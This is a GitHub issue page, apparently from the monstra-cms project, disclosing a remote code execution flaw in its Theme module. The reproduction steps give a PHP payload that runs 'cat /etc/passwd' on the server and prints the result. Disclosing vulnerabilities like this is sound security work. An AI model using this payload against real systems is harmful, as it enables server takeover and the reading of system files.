search

monstra-cms / monstra

THIS PROJECT IS NOT SUPPORTED ANYMORE! Check FLEXTYPE.ORG
http://flextype.org
MIT License
396 stars 123 forks source link

Remote Code Execution via Theme module #464

Closed th3lawbreaker closed 4 years ago

th3lawbreaker commented 4 years ago

Describe the bug An attacker could insert any executable code through php via Theme Module to execution command in the server

To Reproduce

<?php exec('cat /etc/passwd 2>&1', $output); ?>
<?php print_r($output); ?>

Screenshot_2020-05-23_00-52-311727905db1c67506.png

Screenshot_2020-05-23_01-03-263c0e76697d8d8324.png